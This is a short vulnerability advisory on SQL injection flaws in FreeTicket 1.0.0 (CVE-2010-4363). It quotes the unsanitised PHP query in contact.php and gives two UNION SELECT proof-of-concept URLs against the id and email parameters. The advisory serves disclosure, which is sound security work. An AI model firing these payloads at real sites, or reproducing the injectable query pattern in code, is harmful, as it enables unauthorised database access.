SQL injections in FreeTicket
Summary
- Vulnerability
- SQL injections in FreeTicket
- Discovered
- 2010.11.14
- Last Update
- n/a n/a
- ID
- EV0146
- CVE
- CVE-2010-4363
- Risk Level
- medium
- Type
- SQL injection
- Status
- Unpatched. Vendor notified. No reply from developer(s)
- Vendor
- Mrcgiguy (http://www.mrcgiguy.com/)
- Vulnerable Software
- FreeTicket
- Version
- 1.0.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL injection found in FreeTicket script.
- 'id' SQL injection
- Vulnerability found in contact.php script. User-defined variable id is not properly sanitized before being used in SQL query. This can be used to execute arbitrary SQL query
- 'email' SQL injection
- Vulnerable script is contact.php script. email parameter is not properly sanitized before being used in SQL query.
PoC/Exploit
Vulnerable code.
There is no SQL injection filter is used:
$email = $_POST["email"]; $id = $_POST["id"];
if (!$id) {$id = $_GET[id];} if (!$email) {$email = $_GET[email];}
$result=mysql_query("SELECT * FROM messages WHERE uid = \"$id\" AND email = \"$email\"");
'id' SQL injection example.
The following PoC code is available:
http://website.com/contact.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10/*
'email' SQL injection example.
PoC code:
http://website.com/contact.php?email=-1' union select 1,1,1,1,1,1,1,1,1,1/*
Condition.
magic_quotes_gpc = off
Solution.
Solution for "SQL injections in FreeTicket" is not available. Check Mrcgiguy website for updates.